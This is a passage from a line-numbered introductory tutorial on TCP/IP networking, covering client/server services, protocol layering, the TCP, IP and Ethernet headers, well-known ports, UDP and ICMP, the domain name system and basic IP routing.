811microcomputer, it may be turned off, or it may be running an
812application other than the mail system. For this reason, mail is
813normally handled by a larger system, where it is practical to have a
814mail server running all the time. Microcomputer mail software then
815becomes a user interface that retrieves mail from the mail
816server. (See RFC 821 and 822 for specifications for computer mail. See
817RFC 937 for a protocol designed for microcomputers to use in reading
818mail from a mail server.)
819
820These services should be present in any implementation of TCP/IP, except that micro-oriented
821implementations may not support computer mail. These traditional applications still play a very
822important role in TCP/IP-based networks. However more recently, the way in which networks are
823used has been changing. The older model of a number of large, self-sufficient computers is
824beginning to change. Now many installations have several kinds of computers, including
825microcomputers, workstations, minicomputers, and mainframes. These computers are likely to be
826configured to perform specialized
827tasks. Although people are still likely to work with one specific computer, that computer will call on
828other systems on the net for specialized services. This has led to the "server/client" model of
829network services. A server is a system that provides a specific service for the rest of the network.
830A client is another system that uses that service. (Note that the server and client need not be on
831different computers. They could be different programs running on the same computer.)
832
833Here are the kinds of servers typically present in a modern computer setup. Note that these
834computer services can all be provided within the framework of TCP/IP.
835
836[2.0.4] Network File Systems
837 This allows a system to access files on another computer in a
838somewhat more closely integrated fashion than FTP. A network file
839system provides the illusion that disks or other devices from one
840system are directly connected to other systems. There is no need to
841use a special network utility to access a file on another system. Your
842computer simply thinks it has some extra disk drives. These extra
843"virtual" drives refer to the other system's disks. This capability is
844useful for several different purposes. It lets you put large disks on
845a few computers, but still give others access to the disk space. Aside
846from the obvious economic benefits, this allows people working on
847several computers to share common files. It makes system maintenance
848and backup easier, because you don't have to worry about updating and
849backing up copies on lots of different machines. A number of vendors
850now offer high-performance diskless computers. These computers have no
851disk drives at all. They are entirely dependent upon disks attached to
852common "file servers". (See RFC's 1001 and 1002 for a description of
853PC-oriented NetBIOS over TCP. In the workstation and minicomputer
854area, Sun's Network File System is more likely to be used. Protocol
855specifications for it are available from Sun Microsystems.)
856
857[2.0.5] Remote Printing
858 This allows you to access printers on other computers as if
859they were directly attached to yours. (The most commonly used protocol
860is the remote lineprinter protocol from Berkeley Unix. Unfortunately,
861there is no protocol document for this. However the C code is easily
862obtained from Berkeley, so implementations are common.)
863
864[2.0.6] Remote Execution
865 This allows you to request that a particular program be run on
866a different computer. This is useful when you can do most of your work
867on a small computer, but a few tasks require the resources of a larger
868system. There are a number of different kinds of remote execution.
869Some operate on a command by command basis. That is, you request that
870a specific command or set of commands should run on some specific
871computer. (More sophisticated versions will choose a system that
872happens to be free.) However there are also "remote procedure call"
873systems that allow a program to call a subroutine that will run on
874another computer. (There are many protocols of this sort. Berkeley
875Unix contains two servers to execute commands remotely: rsh and
876rexec. The man pages describe the protocols that they use. The
877user-contributed software with Berkeley 4.3 contains a "distributed
878shell" that will distribute tasks among a set of systems, depending
879upon load. Remote procedure call mechanisms have been a topic for
880research for a number of years, so many organizations have
881implementations of such facilities. The most widespread
882commercially-supported remote procedure call protocols seem to be
883Xerox's Courier and Sun's RPC. Protocol documents are available from
884Xerox and Sun. There is a public implementation of Courier over TCP as
885part of the user-contributed software with Berkeley 4.3. An
886implementation of RPC was posted to Usenet by Sun, and also appears as
887part of the user-contributed software with Berkeley 4.3.)
888
889[2.0.7] Name Servers
890 In large installations, there are a number of different
891collections of names that have to be managed. This includes users and
892their passwords, names and network addresses for computers, and
893accounts. It becomes very tedious to keep this data up to date on all
894of the computers. Thus the databases are kept on a small number of
895systems. Other systems access the data over the network. (RFC 822 and
896823 describe the name server protocol used to keep track of host names
897and Internet addresses on the Internet. This is now a required part of
898any TCP/IP implementation. IEN 116 describes an older name server
899protocol that is used by a few terminal servers and other products to
900look up host names. Sun's Yellow Pages system is designed as a general
901mechanism to handle user names, file sharing groups, and other
902databases commonly used by Unix systems. It is widely available
903commercially. Its protocol definition is available from Sun.)
904
905[2.0.8] Terminal Servers
906 Many installations no longer connect terminals directly to
907computers. Instead they connect them to terminal servers. A terminal
908server is simply a small computer that only knows how to run telnet
909(or some other protocol to do remote login). If your terminal is
910connected to one of these, you simply type the name of a computer, and
911you are connected to it. Generally it is possible to have active
912connections to more than one computer at the same time. The terminal
913server will have provisions to switch between connections rapidly, and
914to notify you when output is waiting for another connection. (Terminal
915servers use the telnet protocol, already mentioned. However any real
916terminal server will also have to support name service and a number of
917other protocols.)
918
919[2.0.9] Network-Oriented Window Systems
920 Until recently, high- performance graphics programs had to
921execute on a computer that had a bit-mapped graphics screen directly
922attached to it. Network window systems allow a program to use a
923display on a different computer. Full-scale network window systems
924provide an interface that lets you distribute jobs to the systems that
925are best suited to handle them, but still give you a single
926graphically-based user interface. (The most widely-implemented window
927system is X. A protocol description is available from MIT's Project
928Athena. A reference implementation is publicly available from MIT. A
929number of vendors are also supporting NeWS, a window system defined by
930Sun. Both of these systems are designed to use TCP/IP.)
931
932Note that some of the protocols described above were designed by Berkeley, Sun, or other
933organizations. Thus they are not officially part of the Internet protocol suite. However they are
934implemented
935using TCP/IP, just as normal TCP/IP application protocols are. Since the protocol definitions are
936not considered proprietary, and since commercially-support implementations are widely available,
937it is
938reasonable to think of these protocols as being effectively part of the Internet suite.
939
940Also note that the list above is simply a sample of the sort of services available through TCP/IP.
941However it does contain the majority of the "major" applications. The other commonly-used
942protocols tend to be
943specialized facilities for getting information of various kinds, such as who is logged in, the time of
944day, etc. However if you need a facility that is not listed here, we encourage you to look through
945the current edition of Internet Protocols (currently RFC 1011), which lists all of the available
946protocols, and also to look at some of the major TCP/IP implementations to see what various
947vendors have added.
948
949[2.1.0] General description of the TCP/IP protocols
950
951TCP/IP is a layered set of protocols. In order to understand what this means, it is useful to look at
952an example. A typical situation is sending mail. First, there is a protocol for mail. This defines a
953set of commands which one machine sends to another, e.g. commands to specify who the sender
954of the message is, who it is being sent to, and then the text of the message. However this
955protocol assumes that there is a way to communicate reliably between the two computers. Mail,
956like other application protocols, simply defines a set of commands and messages to be sent. It is
957designed to be used together with TCP and IP.
958
959TCP is responsible for making sure that the commands get through to the other end. It keeps
960track of what is sent, and retransmits anything that did not get through. If any message is too
961large for one
962datagram, e.g. the text of the mail, TCP will split it up into several datagrams, and make sure that
963they all arrive correctly. Since these functions are needed for many applications, they are put
964together into
965a separate protocol, rather than being part of the specifications for sending mail. You can think of
966TCP as forming a library of routines that applications can use when they need reliable network
967communications with another computer.
968
969Similarly, TCP calls on the services of IP. Although the services that TCP supplies are needed by
970many applications, there are still some kinds of applications that don't need them. However there
971are some
972services that every application needs. So these services are put together into IP. As with TCP,
973you can think of IP as a library of routines that TCP calls on, but which is also available to
974applications that don't use TCP. This strategy of building several levels of protocol is called
975"layering". We think of the applications programs such as mail, TCP, and IP, as being separate
976"layers", each of which calls on the services of the layer below it. Generally, TCP/IP applications
977use 4 layers: an application protocol such as mail, a protocol such as TCP that provides services
978need by many applications IP, which provides the basic service of getting datagrams to their
979destination the protocols needed to manage a specific physical medium, such as Ethernet or a
980point to point line.
981
982TCP/IP is based on the "catenet model". (This is described in more detail in IEN 48.) This model
983assumes that there are a large number of independent networks connected together by
984gateways. The user should be able to access computers or other resources on any of these
985networks. Datagrams will often pass through a dozen different networks before getting to their
986final destination.
987
988The routing needed to accomplish this should be completely invisible to the user. As far as the
989user is concerned, all he needs to know in order to access another system is an "Internet
990address". This is an
991address that looks like 128.6.4.194. It is actually a 32-bit number. However it is normally written
992as 4 decimal numbers, each representing 8 bits of the address. (The term "octet" is used by
993Internet documentation for such 8-bit chunks. The term "byte" is not used, because TCP/IP is
994supported by some computers that have byte sizes other than 8 bits.) Generally the structure of
995the address gives
996you some information about how to get to the system. For example, 128.6 is a network number
997assigned by a central authority to Rutgers University. Rutgers uses the next octet to indicate
998which of the
999campus Ethernets is involved. 128.6.4 happens to be an Ethernet used by the Computer Science
1000Department. The last octet allows for up to 254 systems on each Ethernet. (It is 254 because 0
1001and 255 are not allowed, for reasons that will be discussed later.) Note that 128.6.4.194 and
1002128.6.5.194 would be different systems. The structure of an Internet address is described in a bit
1003more detail later.
1004
1005Of course we normally refer to systems by name, rather than by Internet address. When we
1006specify a name, the network software looks it up in a database, and comes up with the
1007corresponding Internet
1008address.
1009
1010Most of the network software deals strictly in terms of the address. (RFC 882 describes the name
1011server technology used to handle this lookup.) TCP/IP is built on "connectionless" technology.
1012Information is transferred as a sequence of "datagrams". A datagram is a collection of data that is
1013sent as a single
1014message. Each of these datagrams is sent through the network individually. There are provisions
1015to open connections (i.e. to start a conversation that will continue for some time). However at
1016some level, information from those connections is broken up into datagrams, and those
1017datagrams are treated by the network as completely separate.
1018
1019For example, suppose you want to transfer a 15000 octet file. Most networks can't handle a
102015000 octet datagram. So the protocols will break this up into something like 30 500-octet
1021datagrams. Each of these datagrams will be sent to the other end. At that point, they will be put
1022back together into the 15000-octet
1023file. However while those datagrams are in transit, the network doesn't know that there is any
1024connection between them. It is perfectly possible that datagram 14 will actually arrive before
1025datagram 13. It is also possible that somewhere in the network, an error will occur, and some
1026datagram won't get through at all. In that case, that datagram has to be sent again.
1027
1028Note by the way that the terms "datagram" and "packet" often seem to be nearly interchangable.
1029Technically, datagram is the right word to use when describing TCP/IP. A datagram is a unit of
1030data, which is what the protocols deal with. A packet is a physical thing, appearing on an Ethernet
1031or some wire. In most cases a packet simply contains a datagram, so there is very little
1032difference. However they can differ. When TCP/IP is used on top of X.25, the X.25 interface
1033breaks the datagrams up into 128-byte packets. This is invisible to IP, because the packets are
1034put back together into a single datagram at
1035the other end before being processed by TCP/IP. So in this case, one IP datagram would be
1036carried by several packets. However with most media, there are efficiency advantages to sending
1037one datagram per
1038packet, and so the distinction tends to vanish.
1039
1040[2.1.1] The TCP Level
1041
1042Two separate protocols are involved in handling TCP/IP datagrams. TCP (the "transmission
1043control protocol") is responsible for breaking up the message into datagrams, reassembling them
1044at the other end, resending anything that gets lost, and putting things back in the right order. IP
1045(the "internet protocol") is responsible for routing individual datagrams. It may seem like TCP is
1046doing all the work. And
1047in small networks that is true. However in the Internet, simply getting a datagram to its destination
1048can be a complex job. A connection may require the datagram to go through several networks at
1049Rutgers, a serial line to the John von Neuman Supercomputer Center, a couple of Ethernets
1050there, a series of 56Kbaud phone lines to another NSFnet site, and more Ethernets on another
1051campus. Keeping track of
1052the routes to all of the destinations and handling incompatibilities among different transport media
1053turns out to be a complex job.
1054
1055Note that the interface between TCP and IP is fairly simple. TCP simply hands IP a datagram with
1056a destination. IP doesn't know how this datagram relates to any datagram before it or after it. It
1057may
1058have occurred to you that something is missing here. We have talked about Internet addresses,
1059but not about how you keep track of multiple connections to a given system. Clearly it isn't
1060enough to get a
1061datagram to the right destination. TCP has to know which connection this datagram is part of.
1062
1063This task is referred to as "demultiplexing." In fact, there are several levels of demultiplexing
1064going on in TCP/IP. The information needed to do this demultiplexing is contained in a series of
1065"headers". A header is simply a few extra octets tacked onto the beginning of a datagram by
1066some protocol in order to keep track of it. It's a lot like putting a letter into an envelope and putting
1067an address on the outside of the envelope. Except with modern networks it happens several
1068times. It's like you put the letter into a little
1069envelope, your secretary puts that into a somewhat bigger envelope, the campus mail center puts
1070that envelope into a still bigger one, etc.
1071
1072Here is an overview of the headers that get stuck on a message that passes through a typical
1073TCP/IP network:
1074
1075We start with a single data stream, say a file you are trying to send to some other computer:
1076
1077TCP breaks it up into manageable chunks. (In order to do this, TCP has to know how large a
1078datagram your network can handle. Actually, the TCP's at each end say how big a datagram they
1079can handle, and then they pick the smallest size.)
1080
1081TCP puts a header at the front of each datagram. This header actually contains at least 20 octets,
1082but the most important ones are a source and destination "port number" and a "sequence
1083number". The port
1084numbers are used to keep track of different conversations. Suppose 3 different people are
1085transferring files. Your TCP might allocate port numbers 1000, 1001, and 1002 to these transfers.
1086When you are sending a datagram, this becomes the "source" port number, since you are the
1087source of the datagram. Of course the TCP at the other end has assigned a port number of its
1088own for the conversation. Your TCP has to know the port number used by the other end as well.
1089(It finds out when the connection starts, as we will explain below.) It puts this in the "destination"
1090port field. Of course if the other end sends a
1091datagram back to you, the source and destination port numbers will be reversed, since then it will
1092be the source and you will be the destination.
1093
1094Each datagram has a sequence number. This is used so that the other end can make sure that it
1095gets the datagrams in the right order, and that it hasn't missed any. (See the TCP specification for
1096details.) TCP doesn't number the datagrams, but the octets. So if there are 500 octets of data in
1097each datagram, the first datagram might be numbered 0, the second 500, the next 1000, the next
10981500,
1099etc.
1100
1101Finally, I will mention the Checksum. This is a number that is computed by adding up all the
1102octets in the datagram (more or less - see the TCP spec). The result is put in the header. TCP at
1103the other end computes the checksum again. If they disagree, then something bad happened to
1104the datagram in transmission, and it is thrown away.
1105
1106The window is used to control how much data can be in transit at any one time. It is not practical
1107to wait for each datagram to be acknowledged before sending the next one. That would slow
1108things down
1109too much. On the other hand, you can't just keep sending, or a fast computer might overrun the
1110capacity of a slow one to absorb data. Thus each end indicates how much new data it is currently
1111prepared to
1112absorb by putting the number of octets in its "Window" field. As the computer receives data, the
1113amount of space left in its window decreases. When it goes to zero, the sender has to stop. As
1114the receiver processes the data, it increases its window, indicating that it is ready to accept more
1115data. Often the same datagram can be used to acknowledge receipt of a set of data and to give
1116permission for
1117additional new data (by an updated window).
1118
1119The "Urgent" field allows one end to tell the other to skip ahead in its processing to a particular
1120octet. This is often useful for handling asynchronous events, for example when you type a control
1121character or other command that interrupts output. The other fields are beyond the scope of this
1122document.
1123
1124[2.1.2] The IP level
1125
1126TCP sends each of these datagrams to IP. Of course it has to tell IP the Internet address of the
1127computer at the other end. Note that this is all IP is concerned about. It doesn't care about what is
1128in the
1129datagram, or even in the TCP header. IP's job is simply to find a route for the datagram and get it
1130to the other end. In order to allow gateways or other intermediate systems to forward the
1131datagram, it
1132adds its own header.
1133
1134The main things in this header are the source and destination Internet address (32-bit addresses,
1135like 128.6.4.194), the protocol number, and another checksum. The source Internet address is
1136simply the address of your machine. (This is necessary so the other end knows where the
1137datagram came from.) The destination Internet address is the address of the other machine. (This
1138is necessary so any gateways in the middle know where you want the datagram to go.) The
1139protocol number tells IP at the other end to send the datagram to TCP. Although most IP traffic
1140uses TCP, there are other protocols that can use IP, so you have to tell IP which protocol to send
1141the datagram to.
1142
1143Finally, the checksum allows IP at the other end to verify that the header wasn't damaged in
1144transit. Note that TCP and IP have separate checksums. IP needs to be able to verify that the
1145header didn't get
1146damaged in transit, or it could send a message to the wrong place. For reasons not worth
1147discussing here, it is both more efficient and safer to have TCP compute a separate checksum for
1148the TCP header and data.
1149
1150Again, the header contains some additional fields that have not been discussed. Most of them are
1151beyond the scope of this document. The flags and fragment offset are used to keep track of the
1152pieces when a
1153datagram has to be split up. This can happen when datagrams are forwarded through a network
1154for which they are too big. (This will be discussed a bit more below.) The time to live is a number
1155that is
1156decremented whenever the datagram passes through a system. When it goes to zero, the
1157datagram is discarded. This is done in case a loop develops in the system somehow. Of course
1158this should be impossible, but well-designed networks are built to cope with "impossible"
1159conditions.
1160
1161At this point, it's possible that no more headers are needed. If your computer happens to have a
1162direct phone line connecting it to the destination computer, or to a gateway, it may simply send
1163the
1164datagrams out on the line (though likely a synchronous protocol such as HDLC would be used,
1165and it would add at least a few octets at the beginning and end).
1166
1167[2.1.3] The Ethernet level
1168
1169Most of our networks these days use Ethernet. So now we have to describe Ethernet's headers.
1170Unfortunately, Ethernet has its own addresses. The people who designed Ethernet wanted to
1171make sure that no two machines would end up with the same Ethernet address. Furthermore,
1172they didn't want the user to have to worry about assigning addresses. So each Ethernet controller
1173comes with an address
1174builtin from the factory. In order to make sure that they would never have to reuse addresses, the
1175Ethernet designers allocated 48 bits for the Ethernet address. People who make Ethernet
1176equipment have to
1177register with a central authority, to make sure that the numbers they assign don't overlap any
1178other manufacturer.
1179
1180Ethernet is a "broadcast medium". That is, it is in effect like an old party line telephone. When you
1181send a packet out on the Ethernet, every machine on the network sees the packet. So something
1182is needed
1183to make sure that the right machine gets it. As you might guess, this involves the Ethernet
1184header. Every Ethernet packet has a 14-octet header that includes the source and destination
1185Ethernet address, and
1186a type code. Each machine is supposed to pay attention only to packets with its own Ethernet
1187address in the destination field. (It's perfectly possible to cheat, which is one reason that Ethernet
1188communications are not terribly secure.)
1189
1190Note that there is no connection between the Ethernet address and the Internet address. Each
1191machine has to have a table of what Ethernet address corresponds to what Internet address. (We
1192will describe how
1193this table is constructed a bit later.) In addition to the addresses, the header contains a type
1194code. The type code is to allow for several different protocol families to be used on the same
1195network. So you can
1196use TCP/IP, DECnet, Xerox NS, etc. at the same time. Each of them will put a different value in
1197the type field. Finally, there is a checksum. The Ethernet controller computes a checksum of the
1198entire
1199packet. When the other end receives the packet, it recomputes the checksum, and throws the
1200packet away if the answer disagrees with the original. The checksum is put on the end of the
1201packet, not in the
1202header.
1203
1204When these packets are received by the other end, of course all the headers are removed. The
1205Ethernet interface removes the Ethernet header and the checksum. It looks at the type code.
1206Since the type
1207code is the one assigned to IP, the Ethernet device driver passes the datagram up to IP. IP
1208removes the IP header. It looks at the IP protocol field. Since the protocol type is TCP, it passes
1209the datagram
1210up to TCP. TCP now looks at the sequence number. It uses the sequence numbers and other
1211information to combine all the datagrams into the original file. The ends our initial summary of
1212TCP/IP. There are
1213still some crucial concepts we haven't gotten to, so we'll now go back and add details in several
1214areas. (For detailed descriptions of the items discussed here see, RFC 793 for TCP, RFC 791 for
1215IP, and RFC's
1216894 and 826 for sending IP over Ethernet.)
1217
1218[2.1.4] Well-Known Sockets And The Applications Layer
1219
1220So far, we have described how a stream of data is broken up into datagrams, sent to another
1221computer, and put back together. However something more is needed in order to accomplish
1222anything useful. There
1223has to be a way for you to open a connection to a specified computer, log into it, tell it what file
1224you want, and control the transmission of the file. (If you have a different application in mind, e.g.
1225computer mail, some analogous protocol is needed.) This is done by "application protocols".
1226
1227The application protocols run "on top" of TCP/IP. That is, when they want to send a message,
1228they give the message to TCP. TCP makes sure it gets delivered to the other end. Because TCP
1229and IP take care of all the networking details, the applications protocols can treat a network
1230connection as if it were a simple byte stream, like a terminal or phone line. Before going into
1231more details about applications
1232programs, we have to describe how you find an application.
1233
1234Suppose you want to send a file to a computer whose Internet address is 128.6.4.7. To start the
1235process, you need more than just the Internet address. You have to connect to the FTP server at
1236the other
1237end. In general, network programs are specialized for a specific set of tasks. Most systems have
1238separate programs to handle file transfers, remote terminal logins, mail, etc. When you connect to
1239128.6.4.7, you have to specify that you want to talk to the FTP server. This is done by having
1240"well-known sockets" for each server. Recall that TCP uses port numbers to keep track of
1241individual conversations. User programs normally use more or less random port numbers.
1242However specific port numbers are assigned to the programs that sit waiting for requests.
1243
1244For example, if you want to send a file, you will start a program called "ftp". It will open a
1245connection using some random number, say 1234, for the port number on its end. However it will
1246specify port
1247number 21 for the other end. This is the official port number for the FTP server. Note that there
1248are two different programs involved. You run ftp on your side. This is a program designed to
1249accept commands
1250from your terminal and pass them on to the other end. The program that you talk to on the other
1251machine is the FTP server. It is designed to accept commands from the network connection,
1252rather than an
1253interactive terminal. There is no need for your program to use a well-known socket number for
1254itself. Nobody is trying to find it. However the servers have to have well-known numbers, so that
1255people can open connections to them and start sending them commands. The official port
1256numbers for each program are given in "Assigned Numbers".
1257
1258Note that a connection is actually described by a set of 4 numbers: the Internet address at each
1259end, and the TCP port number at each end. Every datagram has all four of those numbers in it.
1260(The Internet
1261addresses are in the IP header, and the TCP port numbers are in the TCP header.) In order to
1262keep things straight, no two connections can have the same set of numbers. However it is
1263enough for any one number
1264to be different. For example, it is perfectly possible for two different users on a machine to be
1265sending files to the same other machine. This could result in connections with the following
1266parameters:
1267
1268 Internet addresses TCP ports
1269connection 1 128.6.4.194, 128.6.4.7 1234, 21
1270connection 2 128.6.4.194, 128.6.4.7 1235, 21
1271
1272Since the same machines are involved, the Internet addresses are the same. Since they are both
1273doing file transfers, one end of the connection involves the well-known port number for FTP. The
1274only thing
1275that differs is the port number for the program that the users are running. That's enough of a
1276difference. Generally, at least one end of the connection asks the network software to assign it a
1277port number
1278that is guaranteed to be unique. Normally, it's the user's end, since the server has to use a well-
1279known number.
1280
1281Now that we know how to open connections, let's get back to the applications programs. As
1282mentioned earlier, once TCP has opened a connection, we have something that might as well be
1283a simple wire. All
1284the hard parts are handled by TCP and IP. However we still need some agreement as to what we
1285send over this connection. In effect this is simply an agreement on what set of commands the
1286application will
1287understand, and the format in which they are to be sent. Generally, what is sent is a combination
1288of commands and data. They use context to differentiate.
1289
1290For example, the mail protocol works like this: Your mail program opens a connection to the mail
1291server at the other end. Your program gives it your machine's name, the sender of the message,
1292and the
1293recipients you want it sent to. It then sends a command saying that it is starting the message. At
1294that point, the other end stops treating what it sees as commands, and starts accepting the
1295message. Your end then starts sending the text of the message. At the end of the message, a
1296special mark is sent (a dot in the first column). After that, both ends understand that your program
1297is again sending commands. This is the simplest way to do things, and the one that most
1298applications use.
1299
1300File transfer is somewhat more complex. The file transfer protocol involves two different
1301connections. It starts out just like mail. The user's program sends commands like "log me in as
1302this user", "here is
1303my password", "send me the file with this name". However once the command to send data is
1304sent, a second connection is opened for the data itself. It would certainly be possible to send the
1305data on the
1306same connection, as mail does. However file transfers often take a long time. The designers of
1307the file transfer protocol wanted to allow the user to continue issuing commands while the transfer
1308is going
1309on. For example, the user might make an inquiry, or he might abort the transfer. Thus the
1310designers felt it was best to use a separate connection for the data and leave the original
1311command connection for
1312commands. (It is also possible to open command connections to two different computers, and tell
1313them to send a file from one to the other. In that case, the data couldn't go over the command
1314connection.)
1315
1316Remote terminal connections use another mechanism still. For remote logins, there is just one
1317connection. It normally sends data. When it is necessary to send a command (e.g. to set the
1318terminal type or to change some mode), a special character is used to indicate that the next
1319character is a command. If the user happens to type that special character as data, two of them
1320are sent.
1321
1322We are not going to describe the application protocols in detail in this document. It's better to read
1323the RFC's yourself. However there are a couple of common conventions used by applications that
1324will be
1325described here. First, the common network representation: TCP/IP is intended to be usable on
1326any computer. Unfortunately, not all computers agree on how data is represented. There are
1327differences in
1328character codes (ASCII vs. EBCDIC), in end of line conventions (carriage return, line feed, or a
1329representation using counts), and in whether terminals expect characters to be sent individually
1330or a line
1331at a time. In order to allow computers of different kinds to communicate, each applications
1332protocol defines a standard representation.
1333
1334Note that TCP and IP do not care about the representation. TCP simply sends octets. However
1335the programs at both ends have to agree on how the octets are to be interpreted. The RFC for
1336each application specifies the standard representation for that application. Normally it is "net
1337ASCII". This uses ASCII characters, with end of line denoted by a carriage return followed by a
1338line feed. For remote
1339login, there is also a definition of a "standard terminal", which turns out to be a half-duplex
1340terminal with echoing happening on the local machine. Most applications also make provisions for
1341the two
1342computers to agree on other representations that they may find more convenient. For example,
1343PDP-10's have 36-bit words. There is a way that two PDP-10's can agree to send a 36-bit binary
1344file. Similarly,
1345two systems that prefer full-duplex terminal conversations can agree on that. However each
1346application has a standard representation, which every machine must support.
1347
1348Keep in mind that it has become common practice for some corporations to change a services
1349port number on the server side. If your client software is not configured with the same port
1350number, connection will not be successful. We will discuss later in this text how you can perform
1351port scanning on an entire IP address to see which ports are active.
1352
1353[2.1.5] Other IP Protocols
1354Protocols other than TCP: UDP and ICMP
1355
1356So far, we have described only connections that use TCP. Recall that TCP is responsible for
1357breaking up messages into datagrams, and reassembling them properly. However in many
1358applications, we have
1359messages that will always fit in a single datagram. An example is name lookup. When a user
1360attempts to make a connection to another system, he will generally specify the system by name,
1361rather than Internet
1362address. His system has to translate that name to an address before it can do anything.
1363Generally, only a few systems have the database used to translate names to addresses. So the
1364user's system will want to send a query to one of the systems that has the database. This query
1365is going to be very short. It will certainly fit in one datagram. So will the answer. Thus it seems
1366silly to use TCP. Of course TCP does
1367more than just break things up into datagrams. It also makes sure that the data arrives, resending
1368datagrams where necessary. But for a question that fits in a single datagram, we don't need all
1369the
1370complexity of TCP to do this. If we don't get an answer after a few seconds, we can just ask
1371again. For applications like this, there are alternatives to TCP.
1372
1373The most common alternative is UDP ("user datagram protocol"). UDP is designed for
1374applications where you don't need to put sequences of datagrams together. It fits into the system
1375much like TCP. There is a
1376UDP header. The network software puts the UDP header on the front of your data, just as it
1377would put a TCP header on the front of your data. Then UDP sends the data to IP, which adds
1378the IP header, putting
1379UDP's protocol number in the protocol field instead of TCP's protocol number. However UDP
1380doesn't do as much as TCP does. It doesn't split data into multiple datagrams. It doesn't keep
1381track of what it has
1382sent so it can resend if necessary. About all that UDP provides is port numbers, so that several
1383programs can use UDP at once. UDP port numbers are used just like TCP port numbers. There
1384are well-known port
1385numbers for servers that use UDP. Note that the UDP header is shorter than a TCP header. It still
1386has source and destination port numbers, and a checksum, but that's about it. No sequence
1387number, since it is not needed. UDP is used by the protocols that handle name lookups (see IEN
1388116, RFC 882, and RFC 883), and a number of similar protocols.
1389
1390Another alternative protocol is ICMP ("Internet Control Message Protocol"). ICMP is used for error
1391messages, and other messages intended for the TCP/IP software itself, rather than any particular
1392user program. For example, if you attempt to connect to a host, your system may get back an
1393ICMP message saying "host unreachable". ICMP can also be used to find out some information
1394about the network. See RFC 792 for details of ICMP. ICMP is similar to UDP, in that it handles
1395messages that fit in one datagram. However it is even simpler than UDP. It doesn't even have
1396port numbers in its header. Since all ICMP messages are interpreted by the network software
1397itself, no port numbers are needed to say where a ICMP message is supposed to go.
1398
1399[2.1.6] Domain Name System
1400Keeping track of names and information: the domain system
1401
1402As we indicated earlier, the network software generally needs a 32-bit Internet address in order to
1403open a connection or send a datagram. However users prefer to deal with computer names rather
1404than
1405numbers. Thus there is a database that allows the software to look up a name and find the
1406corresponding number. When the Internet was small, this was easy. Each system would have a
1407file that listed all of the
1408other systems, giving both their name and number. There are now too many computers for this
1409approach to be practical. Thus these files have been replaced by a set of name servers that keep
1410track of host
1411names and the corresponding Internet addresses. (In fact these servers are somewhat more
1412general than that. This is just one kind of information stored in the domain system.)
1413
1414Note that a set of interlocking servers are used, rather than a single central one. There are now
1415so many different institutions connected to the Internet that it would be impractical for them to
1416notify a central
1417authority whenever they installed or moved a computer. Thus naming authority is delegated to
1418individual institutions. The name servers form a tree, corresponding to institutional structure. The
1419names
1420themselves follow a similar structure.
1421
1422A typical example is the name BORAX.LCS.MIT.EDU. This is a computer at the Laboratory for
1423Computer Science (LCS) at MIT. In order to find its Internet address, you might potentially have
1424to consult 4
1425different servers. First, you would ask a central server (called the root) where the EDU server is.
1426EDU is a server that keeps track of educational institutions. The root server would give you the
1427names and
1428Internet addresses of several servers for EDU. (There are several servers at each level, to allow
1429for the possibly that one might be down.) You would then ask EDU where the server for MIT is.
1430Again, it
1431would give you names and Internet addresses of several servers for MIT. Generally, not all of
1432those servers would be at MIT, to allow for the possibility of a general power failure at MIT. Then
1433you would ask
1434MIT where the server for LCS is, and finally you would ask one of the LCS servers about BORAX.
1435The final result would be the Internet address for BORAX.LCS.MIT.EDU. Each of these levels is
1436referred to as
1437a "domain". The entire name, BORAX.LCS.MIT.EDU, is called a "domain name". (So are the
1438names of the higher-level domains, such as LCS.MIT.EDU, MIT.EDU, and EDU.)
1439
1440Fortunately, you don't really have to go through all of this most of the time. First of all, the root
1441name servers also happen to be the name servers for the top-level domains such as EDU. Thus
1442a single
1443query to a root server will get you to MIT. Second, software generally remembers answers that it
1444got before. So once we look up a name at LCS.MIT.EDU, our software remembers where to find
1445servers for
1446LCS.MIT.EDU, MIT.EDU, and EDU. It also remembers the translation of BORAX.LCS.MIT.EDU.
1447Each of these pieces of information has a "time to live" associated with it. Typically this is a few
1448days. After that,
1449the information expires and has to be looked up again. This allows institutions to change things.
1450
1451The domain system is not limited to finding out Internet addresses. Each domain name is a node
1452in a database. The node can have records that define a number of different properties. Examples
1453are
1454Internet address, computer type, and a list of services provided by a computer. A program can
1455ask for a specific piece of information, or all information about a given name. It is possible for a
1456node in the
1457database to be marked as an "alias" (or nickname) for another node. It is also possible to use the
1458domain system to store information about users, mailing lists, or other objects.
1459
1460There is an Internet standard defining the operation of these databases, as well as the protocols
1461used to make queries of them. Every network utility has to be able to make such queries, since
1462this is now the official way to evaluate host names. Generally utilities will talk to a server on their
1463own system. This server will take care of contacting the other servers for them. This keeps down
1464the amount of code that has to be in each application program.
1465
1466The domain system is particularly important for handling computer mail. There are entry types to
1467define what computer handles mail for a given name, to specify where an individual is to receive
1468mail, and to
1469define mailing lists. (See RFC's 882, 883, and 973 for specifications of the domain system. RFC
1470974 defines the use of the domain system in sending mail.)
1471
1472[2.1.7] Routing
1473
1474The description above indicated that the IP implementation is responsible for getting datagrams
1475to the destination indicated by the destination address, but little was said about how this would be
1476done. The task of finding how to get a datagram to its destination is referred to as "routing". In
1477fact many of the details depend upon the particular implementation. However some general
1478things can be said.
1479
1480First, it is necessary to understand the model on which IP is based. IP assumes that a system is
1481attached to some local network. We assume that the system can send datagrams to any other
1482system on its own network. (In the case of Ethernet, it simply finds the Ethernet address of the
1483destination system, and puts the datagram out on the Ethernet.) The problem comes when a
1484system is asked to send a datagram to a system on a different network. This problem is handled
1485by gateways. A gateway is a system that connects a network with one or more other networks.
1486Gateways are often normal computers that happen to have more than one network interface. For
1487example, we have a Unix machine that has two different Ethernet interfaces. Thus it is connected
1488to networks 128.6.4 and 128.6.3. This machine can act as a gateway between those two
1489networks. The software on that machine must be set up so that it will forward datagrams from one
1490network to the other. That is, if a machine on network 128.6.4 sends a datagram to the gateway,
1491and the datagram is addressed to a machine on network
1492128.6.3, the gateway will forward the datagram to the destination. Major communications centers
1493often have gateways that connect a number of different networks. (In many cases, special-
1494purpose gateway systems provide better performance or reliability than general-purpose systems
1495acting as gateways. A number of vendors sell such systems.)
1496
1497Routing in IP is based entirely upon the network number of the destination address. Each
1498computer has a table of network numbers. For each network number, a gateway is listed. This is
1499the gateway to be
1500used to get to that network. Note that the gateway doesn't have to connect directly to the network.
1501It just has to be the best place to go to get there. For example at Rutgers, our interface to NSFnet
1502is at
1503the John von Neuman Supercomputer Center (JvNC). Our connection to JvNC is via a high-
1504speed serial line connected to a gateway whose address is 128.6.3.12. Systems on net 128.6.3
